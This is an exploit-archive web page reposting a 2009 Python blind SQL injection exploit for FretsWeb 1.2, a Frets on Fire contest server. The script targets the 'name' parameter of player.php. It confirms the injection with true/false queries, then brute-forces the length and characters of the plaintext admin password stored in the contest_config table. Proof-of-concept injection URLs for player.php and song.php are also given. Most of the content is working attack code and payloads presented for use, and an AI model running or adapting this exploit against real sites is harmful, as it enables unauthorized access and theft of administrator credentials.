首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit 来源：y3nh4ck3r[at]gmail[dot]com 作者：YEnH4ckEr 发布时间：2009-06-18   #!/usr/bin/python #*********************************************************************************************** #*********************************************************************************************** #**              ** #**        ** #**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    ** #**     || || ||  []        [][]   []   []  []     []   []      [] []   []   []    []    ** #   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    ** #**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ #**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>-- #**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ #   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    #**                                       ** #**          ** #**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      ** #**    PROUD TO BE SPANISH!                               ** #**       ** #*********************************************************************************************** #*********************************************************************************************** # #--------------------------------------------------------------------------------------------- #|               (GET var 'name') BLIND SQL INJECTION EXPLOIT                   | #|-------------------------------------------------------------------------------------------| #|                                    |      FretsWeb 1.2      |          | #|  CMS INFORMATION:                ------------------------                             | #|              | #|-->WEB: http://sourceforge.net/projects/fretsweb/             | #|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/                      | #|-->DEMO: N/A      | #|-->CATEGORY: CMS / Games/Entertainment      | #|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...             | #| is an improved version of FoFCS.It is meant for...               | #|-->RELEASED: 2009-05-30      | #|      | #|  CMS VULNERABILITY:      | #|      | #|-->TESTED ON: firefox 3                      | #|-->DORK: N/A              | #|-->CATEGORY: BLIND SQLi PYTHON EXPLOIT              | #|-->AFFECT VERSION: CURRENT (MAYBE <= ?)      | #|-->Discovered Bug date: 2009-06-02      | #|-->Reported Bug date: 2009-06-02      | #|-->Fixed bug date: 2009-06-14      | #|-->Info patch: http://sourceforge.net/projects/fretsweb/      | #|-->Author: YEnH4ckEr      | #|-->mail: y3nh4ck3r[at]gmail[dot]com      | #|-->WEB/BLOG: N/A      | #|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.      | #|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)      | #--------------------------------------------------------------------------------------------- # #------------ #CONDITIONS: #------------ # #magic quotes=OFF # #------- #NEED: #------- # #Valid name # #--------------------------------------- #PROOF OF CONCEPT (SQL INJECTION): #--------------------------------------- # #http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE #http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE # # #http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE #http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE # #-------------- #WATCH VIDEOS #-------------- # # BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI # # LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow # # ############################################################################## ############################################################################## ##**************************************************************************## ##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ## ##**************************************************************************## ##--------------------------------------------------------------------------## ##**************************************************************************## ## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## ##**************************************************************************## ############################################################################## ############################################################################## # #Used modules import urllib,sys,re,os #Defined functions def init(): if(sys.platform=='win32'): os.system("cls") os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit") os.system ("color 02") else: os.sytem("clear") print "\t#######################################################\n\n" print "\t#######################################################\n\n" print "\t##     FretsWeb 1.2 Blind SQL Injection Exploit      ##\n\n" print "\t##       ++Conditions: magic_quotes=OFF              ##\n\n" print "\t##       ++Needed: Valid name                        ##\n\n" print "\t##               Author: Y3nh4ck3r                   ##\n\n" print "\t##      Contact:y3nh4ck3r[at]gmail[dot]com           ##\n\n" print "\t##            Proud to be Spanish!                   ##\n\n" print "\t#######################################################\n\n" print "\t#######################################################\n\n" def request(urltarget): conn=urllib.urlopen(urltarget) outcode=conn.read() #print outcode #--> Active this line for debugger mode return outcode def error(): print "\t------------------------------------------------------------\n" print "\tWeb isn't vulnerable!\n\n" print "\t--->Maybe:\n\n" print "\t\t1.-Patched.\n" print "\t\t2.-Bad path or host.\n" print "\t\t3.-Bad name.\n" print "\t\t4.-Magic quotes ON.\n" print "\t\tEXPLOIT FAILED!\n" print "\t------------------------------------------------------------\n" sys.exit() def testedblindsql(): print "\t-----------------------------------------------------------------\n" print "\tWEB MAYBE BE VULNERABLE!\n\n" print "\tTested Blind SQL Injection.\n" print "\tStarting exploit...\n" print "\t-----------------------------------------------------------------\n\n" def helper(filename): print "\n\t[!!!] FretsWeb 1.2 Blind SQL Injection Exploit\n" print "\t[!!!] USAGE MODE: [!!!]\n" print "\t[!!!] python "+filename+" [HOST] [PATH] [NAME]\n" print "\t[!!!] [HOST]: Web.\n" print "\t[!!!] [PATH]: Home Path.\n" print "\t[!!!] [NAME]: Name for fish\n" print "\t[!!!] Example: python "+filename+" 'www.example.com' 'demo' 'y3nh4ck3r'\n" sys.exit() def brute_length(urlrequest): #Username length flag=1 i=0 while(flag==1): i=i+1 blindsql=urlrequest+"'+AND+(SELECT+length(value)+FROM+contest_config+WHERE+name='admin_password')="+str(i)+"%23" #injected code output=request(blindsql) if(re.search("<title>Fretsweb - Player</title>",output)): flag=2 else: flag=1 #This is the max length of username if (i>50): error() #Save column length length=i print "\t<<<<<--------------------------------------------------------->>>>>\n" print "\tLength catched!\n" print "\tLength Username --> "+str(length)+"\n" print "\tWait several minutes...\n" print "\t<<<<<--------------------------------------------------------->>>>>\n\n" return length def exploiting (lengthvalue,urlrequest): #Bruteforcing values values="" k=1 z=32 while((k<=lengthvalue) and (z<=126)): blindsql=urlrequest+"'+AND+ascii(substring((SELECT+value+FROM+contest_config+WHERE+name='admin_password'),"+str(k)+",1))="+str(z)+"%23" #injected code output=request(blindsql) if(re.search("<title>Fretsweb - Player</title>",output)): values=values+chr(z) k=k+1 z=32 #new char z=z+1 return values #Main init() #Init variables if(len(sys.argv) <= 3):     helper(sys.argv[0]) host=sys.argv[1] path=sys.argv[2] nameforfish=sys.argv[3] finalrequest="http://"+host+"/"+path+"/player.php?name="+nameforfish testblind1=finalrequest+"'+AND+1=1%23" #Return true outcode1=request(testblind1) testblind2=finalrequest+"'+AND+1=0%23" #Return false outcode2=request(testblind2) #Check BSQLi if(outcode1==outcode2): error() else: testedblindsql() #Catching length of admin password lengthadmin=brute_length(finalrequest) #Catching value of password (not hashed) passwordadmin=exploiting(lengthadmin,finalrequest) print "\n\t\t*************************************************\n" print "\t\t*********  EXPLOIT EXECUTED SUCCESSFULLY ********\n" print "\t\t*************************************************\n\n" print "\t\tAdmin-password: "+passwordadmin+"\n\n" print "\n\t\t<<----------------------FINISH!-------------------->>\n\n" print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n" print "\t\t<<------------------------EOF---------------------->>\n\n" #Check all arguments   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Multiple HTTP Server Low Bandw ·compface <= 1.5.2 (XBM File) L ·XOOPS <= 2.3.3 Remote File Dis ·DESlock+ 4.0.2 dlpcrypt.sys Lo ·solaris/x86 portbind/tcp shell ·Edraw PDF Viewer Component < 3 ·linux/x86 setreuid(geteuid(),g ·Carom3D 5.06 Unicode Buffer Ov ·PEEL E-Commerce suffers from a ·McAfee 3.6.0.608 naPolicyManag ·PHP version 5.2.10 has an inva ·Green Dam 3.17 URL Processing   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved